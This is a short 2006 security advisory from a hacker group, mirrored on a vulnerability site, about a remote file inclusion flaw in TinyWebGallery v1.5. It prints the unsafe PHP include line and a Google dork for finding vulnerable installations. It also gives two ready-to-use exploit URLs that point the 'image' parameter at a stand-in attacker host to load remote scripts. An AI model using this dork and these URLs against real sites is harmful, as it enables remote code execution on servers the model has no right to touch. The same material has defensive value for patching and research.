Security Advisory: TinyWebGallery v1.5 ( image ) Remote Include Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  PHPMyRing <= 4.2.0 (view_com.
php) Remote SQL Injection
  Yabb XSS
  Directory Traversal vulnerability in IPCheck Monitor Server
  Mambo/Joomla Component Remository v3.25 (mosConfig_absolu
te_path) Remote File Inclusion Vulnerability

From: x0r0n_(at)_hotmail.com <x0r0n_(at)_hotmail.com>
Date: 11.08.2006
Subject: TinyWebGallery v1.5 ( image ) Remote Include Vulnerability

C Y B E R - W A R R i O R TIM

TinyWebGallery v1.5 ( image ) Remote Include Vulnerability

------------------------------------------------------------------------
------

Author: xoron

------------------------------------------------------------------------
------

Script: TinyWebGallery

------------------------------------------------------------------------
------

Class: Remote

------------------------------------------------------------------------
------

cont@ct: x0r0n[at]hotmail[dot]com

------------------------------------------------------------------------
------

CODE:

<?php

include ($image . ".txt");

?>

------------------------------------------------------------------------
------

google dork: "powered by twg"

------------------------------------------------------------------------
------

Exploit:

http://www.site.com/[path]/examples/image.php?image=http://evil_scripts

http://www.site.com/[path]/examples/examples/image.php2?image=http://evi
l_scripts?

########################################################################
###

# #

#Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends #

# #

########################################################################
###